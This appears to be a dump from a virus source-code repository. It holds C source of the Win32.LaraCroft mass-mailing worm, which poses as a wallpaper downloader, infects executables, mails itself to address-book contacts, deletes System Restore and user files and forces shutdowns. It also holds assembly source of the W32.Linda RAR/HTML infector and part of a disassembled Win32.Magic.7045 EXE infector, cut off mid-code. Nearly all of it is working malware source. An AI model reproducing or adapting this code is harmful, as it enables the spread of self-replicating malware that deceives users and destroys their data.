HKEY RestoreKey,LaraNTKey,LaraWinKey,LaraInstallKey,LaraNewKey;
HANDLE LaraHnd,LaraHndTime;
HMODULE ServiceLib,MessLib;
int Err,ErrSend;
typedef DWORD(*RegServProc)(DWORD,DWORD);
typedef ULONG(*FriendMess)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG);
typedef ULONG(*FriendFound)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*);
typedef ULONG(*FreeMem)(LPVOID);
LPSTR Friend = "a";
#pragma argsused
int PASCAL WinMain
(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpszCmdLine,
int nCmdShow
)
{
//Win32.LaraCroft par ZeMacroKiller98
//Copyright (c) 2000 par ZeMacroKiller98
//Un virus made in FRANCE!!!!!!!!!
WIN32_FIND_DATA LaraHost;
OSVERSIONINFO CurVerInfo;
FILETIME LaraCreateTime,LaraLstAccTime,LaraLstWriTime;
SYSTEMTIME LaraTime;
FriendMess MAPIFriendMess;
FriendFound MAPIFriendFound;
FreeMem MAPIFreeMem;
RegServProc RegisServProcss;
ServiceLib = LoadLibrary("kernel32.dll");
MessLib = LoadLibrary("mapi32.dll");
SearchPath(NULL,_argv[0],NULL,sizeof(LaraPath),LaraPath,NULL);
CurVerInfo.dwOSVersionInfoSize = sizeof(CurVerInfo);
GetVersionEx(&CurVerInfo);
if(CurVerInfo.dwPlatformId==VER_PLATFORM_WIN32_NT)
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&LaraNTKey);
RegSetValueEx(LaraNTKey,"LaraWallpaper",0,REG_SZ,LaraPath,sizeof(LaraPath));
RegCloseKey(LaraNTKey);
}
else
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&LaraWinKey);
RegSetValueEx(LaraWinKey,"LaraWallpaper",0,REG_SZ,LaraPath,sizeof(LaraPath));
RegCloseKey(LaraWinKey);
}
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\LaraCroft\\Install",0,KEY_ALL_ACCESS,&LaraInstallKey)!=ERROR_SUCCESS)
{
MessageBox(NULL,
"Hi Friends,\nThis software downloads automatically new wallpaper on Lara Croft official site\nIf you have any questions, go to www.eidosinterative.com\nPlease register it on our site at www.eidosinteractive.com\\Lara\\Register\n\tThanks to have take this software\n\t\t\tLara Croft",
"Lara Wallpaper Download Software",
MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
//Anti-WinMe Restauration File
GetSystemDirectory(LaraSysDir, sizeof(LaraSysDir));
if(SetCurrentDirectory(lstrcat(LaraSysDir,"\\RESTORE"))!=0)
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&RestoreKey);
RegDeleteValue(RestoreKey,"*StateMgr");
RegCloseKey(RestoreKey);
DeleteFile("rstrui.exe");
}
GetWindowsDirectory(LaraWinDir,sizeof(LaraWinDir));
SetCurrentDirectory(LaraWinDir);
LaraHnd = FindFirstFile("*.exe",&LaraHost);
LaraHoteTrouve:
LaraHndTime = CreateFile(LaraHost.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
GetFileTime(LaraHndTime,&LaraCreateTime,&LaraLstAccTime,&LaraLstWriTime);
CloseHandle(LaraHndTime);
if((lstrcmp(LaraHost.cFileName,"emm386.exe")==0)||(lstrcmp(LaraHost.cFileName,"setver.exe")==0))
goto FichierNonInfecte;
CopyFile(_argv[0],LaraHost.cFileName,FALSE);
LaraHndTime = CreateFile(LaraHost.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
SetFileTime(LaraHndTime,&LaraCreateTime,&LaraLstAccTime,&LaraLstWriTime);
CloseHandle(LaraHndTime);
FichierNonInfecte:
if(FindNextFile(LaraHnd,&LaraHost)==TRUE)
goto LaraHoteTrouve;
FindClose(LaraHnd);
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\LaraCroft\\Install",&LaraNewKey);
RegCloseKey(LaraNewKey);
MessageBox(NULL,"Please send this software about me to your friends...\nYou can select friends into your address book, now\n\t\t\tLara Croft","Lara Wallpaper Download Software",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
MAPIFriendMess = (FriendMess)GetProcAddress(MessLib,"MAPISendMail");
MAPIFriendFound = (FriendFound)GetProcAddress(MessLib,"MAPIResolveName");
MAPIFreeMem = (FreeMem)GetProcAddress(MessLib,"MAPIFreeBuffer");
if((MAPIFriendMess==NULL)||(MAPIFriendFound==NULL)||(MAPIFreeMem==NULL))
{
MessageBox(NULL,"MAPI not installed on this computer\nPlease refer to help to install it","Lara Wallpaper Download Software",MB_OK|MB_ICONEXCLAMATION|MB_SYSTEMMODAL);
SetCurrentDirectory(LaraSysDir);
DeleteFile("*.*");
ExitProcess(0);
}
MapiMessage MyMessage;
MapiRecipDesc stRecip;
MapiFileDesc stFile;
lpMapiRecipDesc lpRecip;
stFile.ulReserved = 0;
stFile.flFlags = 0L;
stFile.nPosition = (ULONG)-1;
stFile.lpszPathName = LaraPath;
stFile.lpszFileName = NULL;
stFile.lpFileType = NULL;
UnResolve:
Err = (MAPIFriendFound)(lhSessionNull,0L,Friend,MAPI_DIALOG,0L,&lpRecip);
if(Err!=SUCCESS_SUCCESS)
{
switch(Err){
case MAPI_E_AMBIGUOUS_RECIPIENT:
MessageBox(NULL,"Please select new email address into your address book","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
break;
case MAPI_E_UNKNOWN_RECIPIENT:
MessageBox(NULL,"Any email address with current letter","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
break;
case MAPI_E_FAILURE:
MessageBox(NULL,"Unknown error into your address book","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_INSUFFICIENT_MEMORY:
MessageBox(NULL,"No enought memory to launch this application\nPlease close other application to continue","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_NOT_SUPPORTED:
MessageBox(NULL,"Email software not installed\nPlese refer to your help for more information","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_USER_ABORT:
MessageBox(NULL,"You have cancelled this dialog box","Lara Wallpaper Download software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
}
goto UnResolve;
}
stRecip.ulReserved = lpRecip->ulReserved;
stRecip.ulRecipClass = MAPI_TO;
stRecip.lpszName = lpRecip->lpszName;
stRecip.lpszAddress = lpRecip->lpszAddress;
stRecip.ulEIDSize = lpRecip->ulEIDSize;
stRecip.lpEntryID = lpRecip->lpEntryID;
MyMessage.ulReserved = 0;
MyMessage.lpszSubject = "Lara Wallpaper Download Software";
MyMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI found on the net a new interesting software about Lara Croft.\nI send you because it's very coooooool!!!\nTry it and say me your opinion about it\n\n\tSee you soon and enjoy to have it")));
MyMessage.lpszMessageType = NULL;
MyMessage.lpszDateReceived = NULL;
MyMessage.lpszConversationID = NULL;
MyMessage.flFlags = 0L;
MyMessage.lpOriginator = NULL;
MyMessage.nRecipCount = 1;
MyMessage.lpRecips = &stRecip;
MyMessage.nFileCount = 1;
MyMessage.lpFiles = &stFile;
ErrSend = (MAPIFriendMess)(lhSessionNull,0L,&MyMessage,0L,0L);
if(ErrSend!=SUCCESS_SUCCESS)
{
MessageBox(NULL,"Sending email create error into your system","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
}
FreeLibrary(MessLib);
}
RegCloseKey(LaraInstallKey);
RegisServProcss = (RegServProc)GetProcAddress(ServiceLib,"RegisterServiceProcess");
STARTUPINFO LaraStartInfo;
PROCESS_INFORMATION LaraProcInfo;
LaraStartInfo.cb = sizeof(STARTUPINFO);
LaraStartInfo.lpReserved = NULL;
LaraStartInfo.lpReserved2 = NULL;
LaraStartInfo.cbReserved2 = 0;
LaraStartInfo.lpDesktop = NULL;
LaraStartInfo.dwFlags = STARTF_FORCEOFFFEEDBACK;
if(CreateProcess(LaraPath,
NULL,
(LPSECURITY_ATTRIBUTES)NULL,
(LPSECURITY_ATTRIBUTES)NULL,
FALSE,
0,
NULL,
NULL,
&LaraStartInfo,
&LaraProcInfo))
{
CloseHandle(LaraProcInfo.hProcess);
CloseHandle(LaraProcInfo.hThread);
}
RegisServProcss(LaraProcInfo.dwProcessId,1);
if((LaraTime.wHour==10)&&(LaraTime.wMinute==0)&&(LaraTime.wSecond==0))
{
MessageBox(NULL,"It's time to connect at Lara Croft official web site\nThanks to Click on OK to continue","Lara Wallpaper Download Software",MB_OK|MB_ICONEXCLAMATION|MB_SYSTEMMODAL);
WritePrivateProfileString("InternetShortcut","URL","http://www.tombraider.com/larasworld/wallpaper.html","LaraCroft.url");
ShellExecute(NULL,"open","LaraCroft.url",NULL,NULL,SW_SHOWNORMAL);
}
if((LaraTime.wDay==25)&&(LaraTime.wMonth==12))
{
MessageBox(NULL,
"Merry christmas by Lara Croft!!!!!!\nHey, your PC is infected by new virus: Win32.LaraCroft\n\nJoyeux Noel de la part de Lara Croft!!!!!!\nTon PC est infect par Win32.LaraCroft fabriqu par ZeMacroKiller98",
"Lara Croft like you, don't you",
MB_OK|MB_ICONEXCLAMATION|MB_SYSTEMMODAL);
SetCurrentDirectory("C:/");
DeleteFile("*.*");
ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0);
}
if(LaraTime.wDay==1)
{
MessageBox(NULL,"Lara Croft is with you!!!!\nAnd don't want you work today....","Win32.LaraCroft",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0);
}
if((LaraTime.wHour>=20)&&(LaraTime.wHour<=6))
{
MessageBox(NULL,"Lara Croft say it's time to stop your PC now!!!!\nAnd go to bed, Ha Ha Ha ha !!!!!","Win32.LaraCroft",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0);
}
FreeLibrary(ServiceLib);
return 0;
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.CPP]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.H]ÄÄÄ
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <shellapi.h>
#include <dos.h>
#include <stdlib.h>
#include <stdio.h>
#include <mapi.h>
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.H]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.TXT]ÄÄÄ
Name: Win32.LaraCroft
Size: 52736 octets
Author: ZeMacroKiller98
Description: This virii try to send itself by email,
if error when i try to send itself then delete in current directory
When install itself, it install itself in current directory as a Wallpaper upload automatically
It contains 2 payloads:
- When day is 25 and month is 12, then delete file in C: directory and reboot computer
- If day is 1, then display message box and shutdown computer
- If hour >=20 and hour <=6, then displays message box and shutdown computer
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.TXT]ÄÄÄ
Win32/Infector/Win32.Legacy.asm
+5676
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Leviathan.asm
+1312
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Linda.asm
+370
View File
@@ -0,0 +1,370 @@
comment §
Name : W32.Linda
Data : February 13th 2002
Author : PetiK
Language : Win32asm
Size : 8192 (compressed with ASPack).
Action : Infects rar files and ht* files in the current directory.
§
.386
locals
jumps
.model flat,STDCALL
api macro x
extrn x:proc
call x
endm
WIN32_FIND_DATA struct
dwFileAttributes dd 0
ftCreationTime dd ?,?
ftLastAccessTime dd ?,?
ftLastWriteTime dd ?,?
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0,0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
db 2 dup (0)
WIN32_FIND_DATA ends
.DATA
CRLF equ <13,10>
ffile WIN32_FIND_DATA <?>
sysTime db 16 dup(0)
orig_virus db 50 dup (0)
thFile dd ?
Err dd 0
time0 dd 0,0
time1 dd 0,0
time2 dd 0,0
Size equ 8192
HeaderSize = EndRARHeader-RARHeader
rarmask db "*.rar",0
htmmask db "*.ht*",0
hFile dd ?
fHnd dd ?
mHnd dd ?
sizer dd 0
octets dd 0
RARHeader:
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw HeaderSize
RARCompressed dd Size
RAROriginal dd Size
RAROs db 0
RARCrc32 dd 0
RARFileTime db 63h,78h
RARFileDate db 31h,24h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw EndRARHeader-RARName
RARAttrib dd 0
RARName db "LINDA32.EXE"
EndRARHeader label byte
.CODE
start_linda:
mov eax,offset sysTime
push eax
api GetSystemTime
lea eax,sysTime
cmp word ptr [eax+2],8 ; August
jne end_pay
cmp word ptr [eax+6],10 ; 10th. Linda's Birthday
jne end_pay
push 40h
call @tit
db "W32RAR.Linda",0
@tit:
call @mes
db "This virus infects only RAR files.",0dh,0ah
db "Happy Birthday - (c)2002",0
@mes:
push 0
api MessageBoxA
end_pay:
push 50
mov esi,offset orig_virus
push esi
push 0
api GetModuleFileNameA
push 4
push 1000h
push 8192
push 0
api VirtualAlloc
test eax,eax
je end_srch_rar
mov dword ptr [mHnd],eax
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset orig_virus
api CreateFileA
cmp eax,-1
je end_srch_rar
mov dword ptr [fHnd],eax
push 0
mov dword ptr [sizer],0
lea eax,sizer
push eax
push 8192
push dword ptr [mHnd]
push dword ptr [fHnd]
api ReadFile
push dword ptr [mHnd]
api CloseHandle
rar_srch:
push offset ffile
push offset rarmask
api FindFirstFileA
dec eax
jz end_srch_rar
inc eax
mov dword ptr [hFile],eax
inf_rar:
call times
call infect
cmp byte ptr [Err],1
je rar_nxt_srch
call timer
rar_nxt_srch:
push offset ffile
mov eax,dword ptr [hFile]
push eax
api FindNextFileA
test eax,eax
jnz inf_rar
mov eax,dword ptr [hFile]
push eax
api FindClose
end_srch_rar:
htm_srch:
push offset ffile
push offset htmmask
api FindFirstFileA
dec eax
jz end_srch_htm
inc eax
mov dword ptr [hFile],eax
inf_htm:
call infecthtm
htm_nxt_srch:
push offset ffile
mov eax,dword ptr [hFile]
push eax
api FindNextFileA
test eax,eax
jnz inf_htm
mov eax,dword ptr [hFile]
push eax
api FindClose
end_srch_htm:
end_linda:
push 0
api ExitProcess
times: push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je tserr
mov dword ptr [thFile],eax
push offset time0
push offset time1
push offset time2
push dword ptr [thFile]
api GetFileTime
push dword ptr [thFile]
api CloseHandle
mov byte ptr [Err],0
ret
tserr: mov byte ptr [Err],1
ret
timer: push 0
push 80h
push 3
push 0
push 1
push 40000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je trerr
mov dword ptr [thFile],eax
push offset time0
push offset time1
push offset time2
push dword ptr [thFile]
api SetFileTime
push dword ptr [thFile]
api CloseHandle
trerr: ret
infecthtm:
push offset ffile.cFileName
api GetFileAttributesA
cmp eax,1 or 20h
je end_inf_htm
push 0
push 80h
push 3
push 0
push 1
push 40000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je end_inf_htm
mov dword ptr [fHnd],eax
push 2
push 0
push dword ptr [fHnd]
api _llseek
push 0
push offset octets
push e_htm - s_htm
call e_htm
s_htm: db "",CRLF,CRLF
db "<SCRIPT Language=VBScript>",CRLF
db "On Error Resume Next",CRLF
db "document.Write ""<font face='verdana' color=green size='2'>Hi guy ! How are you ?"
db "<br>If you read these lines, is that you are infected by my Virus Linda."
db "<br>Look at your RAR files. They could be infected too."
db "<br>Good Bye and have a nice day.<br></font>""",0dh,0ah
db "</SCRIPT>",0dh,0ah
e_htm:
push dword ptr [fHnd]
api WriteFile
push dword ptr [fHnd]
api CloseHandle
push 1 or 20h
push offset ffile.cFileName
api SetFileAttributesA
end_inf_htm:
ret
infect: xor eax,eax
push eax
push 80h
push 3
push eax
push eax
push 40000000h
lea eax,ffile.cFileName
push eax
api CreateFileA
dec eax
jz end_infect
inc eax
mov dword ptr [fHnd],eax
push 2
push 0
push dword ptr [fHnd]
api _llseek ; like SetFilePointer
mov esi,dword ptr [mHnd]
mov edi,Size
call CRC32
mov dword ptr [RARCrc32],eax
mov esi,offset RARHeader+2
mov edi,HeaderSize-2
call CRC32
mov word ptr [RARHeaderCRC],ax
xor eax,eax
push eax
push offset octets
push HeaderSize
push offset RARHeader
push dword ptr [fHnd]
api WriteFile
mov dword ptr [RARHeaderCRC],0
mov dword ptr [RARCrc32],0
mov dword ptr [RARCrc32+2],0
push 0
push offset octets
push Size
push dword ptr [mHnd]
push dword ptr [fHnd]
api WriteFile
push dword ptr [fHnd]
api CloseHandle
end_infect:
ret
CRC32: cld
push ebx
mov ecx,-1 ;xor ecx,ecx & dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0edb8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec di
jnz NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
ret
ends
end start_linda
Win32/Infector/Win32.Magic.7045.asm
+655
View File
@@ -0,0 +1,655 @@
comment *
Win32.Magic.7045 ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
Win32.Magic.7045 is a 7045 bytes runtime/direct action EXE virus. Infects
all files in all directories at drive C:, D:, E: and F:, when executed, by
every file in current directory and Windows directory, when executed, by
prepending the virus to the original EXE file.
Compile Win32.Magic.7045 with Turbo Assembler v 5.0 by typing:
TASM32 /M /ML /Q /ZD VOODOO.ASM
TLINK32 -Tpe -c -x -aa -r -v VOODOO.OBJ,,, IMPORT32
*
.386
.model flat
; KERNEL32.dll
extrn CopyFileA:proc
extrn CloseHandle:proc
extrn CreateFileMappingA:proc
extrn CreateProcessA:proc
extrn DeleteFileA:proc
extrn CreateFileA:proc
extrn FindFirstFileA:proc
extrn FindNextFileA:proc
extrn FlushViewOfFile:proc
extrn GetCommandLineA:proc
extrn GetCurrentDirectoryA:proc
extrn GetExitCodeProcess:proc
extrn GetFileSize:proc
extrn ExitProcess:proc
extrn GetProcAddress:proc
extrn GetStartupInfoA:proc
extrn GlobalAlloc:proc
extrn GlobalFree:proc
extrn GlobalLock:proc
extrn GlobalUnlock:proc
extrn MapViewOfFile:proc
extrn ReadFile:proc
extrn SetCurrentDirectoryA:proc
extrn SetFileAttributesA:proc
extrn SetFileTime:proc
extrn Sleep:proc
extrn UnmapViewOfFile:proc
extrn lstrcpyA:proc
extrn GetModuleHandleA:proc
; USER32.dll
extrn MessageBoxA:proc
.data
VirusSize equ 1b85h ; Size of virus (7045 bytes)
nBufferLength equ 320h ; Size, in characters, of directory
; buffer
MAX_PATH equ 104h
FALSE equ 00h
TRUE equ 01h
FILE_ATTRIBUTE_DIRECTORY equ 10h
; The "file or directory" is a
; directory
FILE_ATTRIBUTE_ARCHIVE equ 20h ; The file is an archive file.
; Applications use this attribute to
; mark files for backup or removal.
CREATE_NEW equ 01h ; Creates a new file. The function
; fails if the specified file already
; exists.
OPEN_EXISTING equ 03h ; Opens the file. The function fails
; if the file does not exist.
FILE_SHARE_READ equ 01h ; Other open operations can be
; performed on the file for read
; access. If the CreateFile function
; is opening the client end of a
; mailslot, this flag is specified.
FILE_SHARE_WRITE equ 02h ; Other open operations can be
; performed on the file for write
; access.
GENERIC_WRITE equ 40000000h
; Specifies write access to the file.
; Data can be written to the file and
; the file pointer can be moved.
GENERIC_READ equ 80000000h
; Specifies read access to the file.
; Data can be read from the file and
; the file pointer can be moved.
PAGE_READWRITE equ 04h ; Gives read-write access to the
; committed region of pages
FILE_MAP_WRITE equ 02h ; Read-write access
NORMAL_PRIORITY_CLASS equ 20h ; Indicates a normal process with no
; special scheduling needs.
INVALID_HANDLE_VALUE equ -01h
STARTUPINFO struct
cb DWORD ? ; Specifies the size, in bytes, of the
; structure.
lpReserved DWORD ? ; Reserved. Set this member to NULL
; before passing the structure to
; CreateProcess
lpDesktop DWORD ? ; Points to a zero-terminated string
; that specifies either the name of
; the desktop only or the name of both
; the window station and desktop for
; this process
lpTitle DWORD ? ; For console processes, this is the
; title displayed in the title bar if
; a new console window is created
dwX DWORD ? ; Specifies the x offset, in pixels,
; of the upper left corner of a window
; if a new window is created. The
; offset is from the upper left corner
; of the screen
dwY DWORD ? ; Specifies the y offset, in pixels,
; of the upper left corner of a window
; if a new window is created. The
; offset is from the upper left corner
; of the screen
dwXSize DWORD ? ; Specifies the width, in pixels, of
; the window if a new window is
; created
dwYSize DWORD ? ; Specifies the height, in pixels, of
; the window if a new window is
; created
dwXCountChars DWORD ? ; Specifies the screen buffer width in
; character columns
dwYCountChars DWORD ? ; Specifies the screen buffer height
; in character rows
dwFillAttribute DWORD ? ; Specifies the initial text and
; background colors if a new console
; window is created
dwFlags DWORD ? ; This is a bit field that determines
; whether certain STARTUPINFO members
; are used when the process creates a
; window
wShowWindow WORD ? ; Specifies the default value the first
; time
cbReserved2 WORD ? ; Reserved; must be zero
lpReserved2 DWORD ? ; Reserved; must be NULL
hStdInput DWORD ? ; Specifies a handle that will be used
; as the standard input handle of the
; process
hStdOutput DWORD ? ; Specifies a handle that will be used
; as the standard output handle of the
; process
hStdError DWORD ? ; Specifies a handle that will be used
; as the standard error handle of the
; process
ends
FILETIME struct
dwLowDateTime DWORD ? ; Specifies the low-order 32 bits of
; the file time
dwHighDateTime DWORD ? ; Specifies the high-order 32 bits of
; the file time
ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ? ; Specifies the file attributes of the
; file found
ftCreationTime FILETIME <> ; Specifies the time the file was
; created
ftLastAccessTime FILETIME <> ; Specifies the time that the file was
; last accessed
ftLastWriteTime FILETIME <> ; Specifies the time that the file was
; last written to
nFileSizeHigh DWORD ? ; Specifies the high-order DWORD value
; of the file size, in bytes
nFileSizeLow DWORD ? ; Specifies the low-order DWORD value
; of the file size, in bytes
dwReserved0 DWORD ? ; Reserved for future use
dwReserved1 DWORD ? ; Reserved for future use
cFileName BYTE MAX_PATH dup(?)
; A null-terminated string that is the
; name of the file
cAlternate BYTE 0eh dup(?) ; A null-terminated string that is an
; alternative name for the file
ends
PROCESS_INFORMATION struct
hProcess DWORD ? ; Handle to the newly created process
hThread DWORD ? ; Handle to the primary thread of the
; newly created process
dwProcessId DWORD ? ; Global process identifier that can
; be used to identify a process
dwThreadId DWORD ? ; global thread identifiers that can
; be used to identify a thread
ends
szFileName db '*.EXE',00h ; Name of file to search for
szFileName_ db '*.*',00h ; " " " " " "
szCurDir db 'c:\',00h ; Name of new current directory
db 'Magic People-Voodoo People !',00h
db 00h
ProcessInformation PROCESS_INFORMATION <>
dwExitCode dd ? ; Termination status
dwFileHandle dd ? ; File handle
dwFileHandle_ dd ? ; File handle
dwMappingHandle dd ? ; File mapping handle
lpMappedView dd ? ; Starting address of the mapped view
dwFileSize dd ? ; Low-order doubleword of the file
; size
infect_flag db ? ; Infection flag
exit_flag db ? ; Exit flag
NumberOfBytesRead dd ? ; Number of bytes read
lpFileExtension dd ? ; Pointer to file extension
StartupInfo STARTUPINFO <>
szFileName__:
db 11ah dup(00h)
db 206h dup(?)
FindFileData WIN32_FIND_DATA <>
db 20eh dup(?)
cBuffer db VirusSize dup(?)
; Buffer that receives data
dwSearchHandle dd ? ; Search handle
dwSearchHandle_ dd ? ; Search handle
szCurDir_:
cBuffer_ db 320h dup(?) ; Buffer for current directory
szCurDir__:
cBuffer__ db 320h dup(?) ; Buffer for current directory
db 724h dup(?)
.code
code_begin:
push offset StartupInfo ; Address of STARTUPINFO structure
call GetStartupInfoA
call GetCommandLineA
mov esi,eax ; ESI = pointer to the command-line
; string for the current process
cmp byte ptr [esi+01h],':' ; Not Universal Naming Convention
; (UNC)?
je _lstrcpyA ; Equal? Jump to _lstrcpyA
inc eax ; Increase pointer to the command-line
; string for the current process
_lstrcpyA:
push eax ; EAX = address of string to copy
push offset szFileName__ ; Address of buffer
call lstrcpyA
lea esi,szFileName__ ; ESI = offset of szFileName__
find_dot_in_filename:
inc esi ; Increase pointer to the command-line
; string for the current process
cmp byte ptr [esi],'.' ; Found dot in filename?
jne find_dot_in_filename ; Not equal? Jump to
; find_dot_in_filename
mov byte ptr [esi+04h],00 ; Store zero at end of filename
mov [lpFileExtension],esi ; Store pointer to file extension
push 00h ; Handle of file with attributes to
; copy
push FILE_ATTRIBUTE_ARCHIVE ; File attributes
push OPEN_EXISTING ; How to create
push 00h ; Address of security descriptor
push FILE_SHARE_READ ; Share mode
push GENERIC_READ ; Access (read-write) mode
push offset szFileName__ ; Address of name of the file
call CreateFileA
mov [dwFileHandle],eax ; Store file handle
push eax ; EAX = file handle
push 00h ; Address of structure for data
push offset NumberOfBytesRead
; Address of number of bytes read
push VirusSize ; Number of bytes to read
push offset cBuffer ; Address of buffer that receives data
push eax ; Handle of file to read
call ReadFile
pop eax ; EAX = file handle
push 00h ; Address of high-order word for file
; size
push eax ; Handle of file to get size of
call GetFileSize
mov [dwFileSize],eax ; Store low-order doubleword of the
; file size
cmp eax,VirusSize ; First generation?
je virus_exit ; Equal? Jump to virus_exit
mov esi,[lpFileExtension] ; ESI = pointer to file extension
mov [esi],'MOC.' ; Store file extension
cmp [esi+05h],'$$$$' ; Temporarily disnfected file?
je _DeleteFileA ; Equal? Jump to _DeleteFileA
push 00h ; Handle of file with attributes to
; copy
push FILE_ATTRIBUTE_ARCHIVE ; File attributes
push CREATE_NEW + OPEN_EXISTING
; How to create
push 00h ; Address of security descriptor
push FILE_SHARE_READ + FILE_SHARE_WRITE
; Share mode
push GENERIC_READ + GENERIC_WRITE
; Access (read-write) mode
push offset szFileName__ ; Address of name of the file
call CreateFileA
mov [dwFileHandle_],eax ; Store file handle
push 00h ; Name of file-mapping object
push [dwFileSize] ; Low-order doubleword of object size
push 00h ; High-order doubleword of object size
push PAGE_READWRITE ; Protection for mapping object
push 00h ; Optional security attributes
push [dwFileHandle_] ; Handle of file to map
call CreateFileMappingA
mov [dwMappingHandle],eax ; Store file mapping handle
push [dwFileSize] ; Low-order doubleword of object size
push 00h ; Low-order doubleword of file offset
push 00h ; High-order doubleword of file offset
push FILE_MAP_WRITE ; Access mode
push eax ; File-mapping object to map into
; address space
call MapViewOfFile
mov [lpMappedView],eax ; Store starting address of the mapped
; view
push 00h ; Address of structure for data
push offset NumberOfBytesRead
; Address of number of bytes read
push [dwFileSize] ; Low-order doubleword of object size
push eax ; Address of buffer that receives data
push [dwFileHandle] ; Handle of file to read
call ReadFile
push 00h ; Number of bytes in range
push [lpMappedView] ; Starting address of the mapped view
call FlushViewOfFile
push [lpMappedView] ; Address where mapped view begins
call UnmapViewOfFile
push [dwMappingHandle] ; Handle of object to close
call CloseHandle
push [dwFileHandle_] ; Handle of object to close
call CloseHandle
push offset ProcessInformation
; Pointer to PROCESS_INFORMATION
push offset StartupInfo ; Pointer to STARTUPINFO
push 00h ; Pointer to current directory name
push 00h ; Pointer to new environment block
push NORMAL_PRIORITY_CLASS ; Creation flags
push 00h ; Handle inheritance flag
push 00h ; Pointer to thread security
; attributes
push 00h ; Pointer to process security
; attributes
mov esi,[lpFileExtension] ; ESI = pointer to file extension
mov byte ptr [esi+04h],' ' ; Store space at end of filename
